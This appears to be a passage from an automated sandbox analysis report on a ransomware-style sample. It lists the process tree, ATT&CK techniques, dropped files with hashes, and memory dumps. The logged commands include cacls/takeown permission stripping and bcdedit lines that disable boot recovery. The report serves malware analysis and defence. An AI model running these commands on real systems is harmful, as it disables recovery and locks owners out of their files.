- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4368
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4468
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5040
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:3908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1952
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4452
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3452
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:2372
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3668
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2784
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:1428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:836
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2108
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4316
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3700
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3144
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5096
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:3216
- - C:\Windows\system32\takeown.exe
    takeown /f C:\ProgramData /a
    3⤵
    - Modifies file permissions
    PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1764
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /g Administrators:f
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:544
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /g Users:r
    3⤵
    PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3452
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /g Administrators:r
    3⤵
    PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2408
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d SERVICE
    3⤵
    PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3088
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d mssqlserver
    3⤵
    PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2200
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d "network service"
    3⤵
    PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4312
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d system
    3⤵
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4804
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d mssql$sqlexpress
    3⤵
    PID:3336
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Users\Public /a
    3⤵
    - Modifies file permissions
    PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3780
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /g Administrators:f
    3⤵
    PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:632
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /g Users:r
    3⤵
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3172
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /g Administrators:r
    3⤵
    PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1336
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d SERVICE
    3⤵
    PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5620
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d mssqlserver
    3⤵
    PID:5636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5752
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d "network service"
    3⤵
    PID:5768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5020
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d system
    3⤵
    PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5184
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d mssql$sqlexpress
    3⤵
    PID:3628
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4892

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\Admin\Local Settings\Microsoft\CLR_v4.0\UsageLogs\7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe.log

Filesize
1KB

MD5
7306db0ea2eaae206982be9b97ed95f9

SHA1
7421383bbf06289a33c5b3ee418efbd1199e8537

SHA256
5b443559ef2ec2636fd8bb53669e4f0b72d24550960fdd46e3313160836e4984

SHA512
4a7ecd4cce5bbe06acffb3bf28a7a6629b5cd6c0fe2d7155e30c4eeb157920d28c97f0c01870fee90ef84f1c71b78b67615d11c24d93710bc36a9c13aee17c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat

Filesize
10KB

MD5
1726416850d3bba46eeb804fae57083d

SHA1
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196

SHA256
c207a7a561ab726fb272b5abd99c4da8e927b5da788210d5dd186023c2783990

SHA512
7747e5c6bd77a43ee958cb7b533a73757e8bfb7b3706af4eb7ec9a99458720f89cd30bb23b4cb069826dc36a6ce737424ad0007307be67a7391591f6c936df27

Download Submit
C:\Users\Admin\Contacts\HOW TO BACK FILES.txt

Filesize
1KB

MD5
09fed3ac0369fa71bb05a8e700e581ea

SHA1
c75b2cb29d00ed1ec9fed42c928a1e1ca6430ca8

SHA256
d3099c829d2e1a722a6570a0bd9ebd54e63646bf601615d8053d385866de570b

SHA512
8b76f72ecc893205adaee57b3c70aa64582ad396d4ae44b68087dbd72e591ac93b55ac3e73857b15e4a74d09408d52f9996d0393350908163f5fb5484eec2fe4

Download Submit
memory/736-3056-0x0000000140000000-0x0000000140066000-memory.dmp

Filesize
408KB

Download
memory/736-950-0x0000000140000000-0x0000000140066000-memory.dmp

Filesize
408KB

Download
memory/2016-38-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-46-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-10-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-8-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-12-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-14-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-16-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-18-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-20-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-22-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-24-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-26-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-28-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-30-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-32-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-34-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-36-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-0-0x0000017114490000-0x0000017114558000-memory.dmp

Filesize
800KB

Download
memory/2016-40-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-42-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-44-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-6-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-48-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-50-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-52-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-54-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-56-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-58-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-60-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-62-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-64-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-66-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-68-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-937-0x0000017114970000-0x0000017114971000-memory.dmp

Filesize
4KB

Download
memory/2016-938-0x0000017116240000-0x000001711629C000-memory.dmp

Filesize
368KB

Download
memory/2016-939-0x0000017116460000-0x00000171164AC000-memory.dmp

Filesize
304KB

Download
memory/2016-5-0x00000171163A0000-0x000001711645D000-memory.dmp

Filesize
756KB

Download
memory/2016-4-0x000001712ED50000-0x000001712ED60000-memory.dmp

Filesize
64KB

Download
memory/2016-951-0x00007FFE1F020000-0x00007FFE1FAE1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-3-0x00007FFE1F020000-0x00007FFE1FAE1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-2-0x00000171163A0000-0x0000017116464000-memory.dmp

Filesize
784KB

Download
memory/2016-1-0x00000171162E0000-0x00000171163A2000-memory.dmp

Filesize
776KB

Download